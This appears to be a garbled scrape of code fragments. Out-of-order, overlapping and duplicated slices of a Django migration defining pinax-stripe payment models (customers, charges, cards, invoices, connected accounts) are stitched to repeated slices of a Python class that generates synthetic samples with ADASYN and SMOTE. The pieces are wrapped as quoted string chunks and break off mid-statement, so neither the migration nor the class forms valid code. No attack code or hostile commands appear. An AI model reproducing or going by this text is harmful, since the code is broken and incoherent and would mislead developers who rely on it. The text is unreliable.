models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name',", "models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)),", "models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True,", "('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False,", "models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version',", "('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True,", "null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id',", "decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode',", "models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ),", "null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ],", "null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)),", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[", "from decimal import Decimal from django.conf import settings from django.db import migrations, models", "}, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True,", "max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name',", "models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details',", "('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event',", "name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer',", "models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True,", "migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True,", "models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start',", "name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract':", "('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True,", "('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False,", "models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True,", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency',", "'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)),", "('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True,", "models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency',", "models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[", "name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges',", "('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True,", "= [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)),", "null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)),", "max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[", "models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding',", "models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True,", "models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, },", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)),", "models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)),", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract':", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ],", "('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds',", "('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account',", "max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)),", "null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)),", "migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether(", "('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city',", "null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan',", "('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)),", "('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException',", "models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)),", "primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user',", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32,", "'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model)," ]
[ "parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors =", "return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import make_classification", "import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() #", "SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors", "# # from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100,", "sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features = 2,", "TODO Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn", "y) except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not", "# ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1]) # =============================================================================", "= min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and", "y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def", "= \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= #", "of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y =", "# # TEST # # from sklearn.datasets import make_classification # X, y =", "# # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201)", "'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than", "= 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller", "ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ =", "parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_", "random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y", "<reponame>Arzik1987/prelim import numpy as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand", "= 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y ==", "============================================================================= # # TEST # # from sklearn.datasets import make_classification # X, y", "X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2, #", "X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss =", "class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X,", "self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the number of", "= 2, n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes", "sample size is smaller than the number of observations in train\") parss =", "sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample", "from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def", "ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError):", "metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not majority'", "n_repeated = 0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot", "# TEST # # from sklearn.datasets import make_classification # X, y = make_classification(n_samples", "# from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features", "self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X,", "# random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) #", "number of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y", "from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy", "Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <=", "my_name(self): return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import", "import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None", "parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return", "is smaller than the number of observations in train\") parss = 'all' y", "= ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError,", "self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The", "parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is", "ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0],", "y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_", "\"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_", "imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self):", "else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ #", "smaller than the number of observations in train\") parss = 'all' y =", "= 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew)", "= 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples", "return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples:", "not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y", "np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5,", "np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y =", "if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples,", "SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\"", "np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew =", "Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew)", "None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not", "= parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\"", "and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy", "majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the", "= n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect", "try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X,", "X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples =", "= SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ =", "= parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE", "= \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return", "# ============================================================================= # # TEST # # from sklearn.datasets import make_classification # X,", "size is smaller than the number of observations in train\") parss = 'all'", "'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples =", "y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples)))", "np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) #", "Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1]) #", "n_classes = 1, # random_state = 0) # import matplotlib.pyplot as plt #", "Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y)", "min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state", "type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0])", "1, # random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1])", "= np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0])", "Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y)", "parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_,", "plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples", "y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not", "self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples", "y = make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant", "observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y)", "and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors =", "return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST", "parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray", "in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X", "X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples,", "self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state =", "(ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray: from", "2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5,", "random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # #", "= parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else:", "= 1, # random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0],", "\"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self,", "make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant = 0,", "= np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn =", "src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\"", "import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss,", "TEST # # from sklearn.datasets import make_classification # X, y = 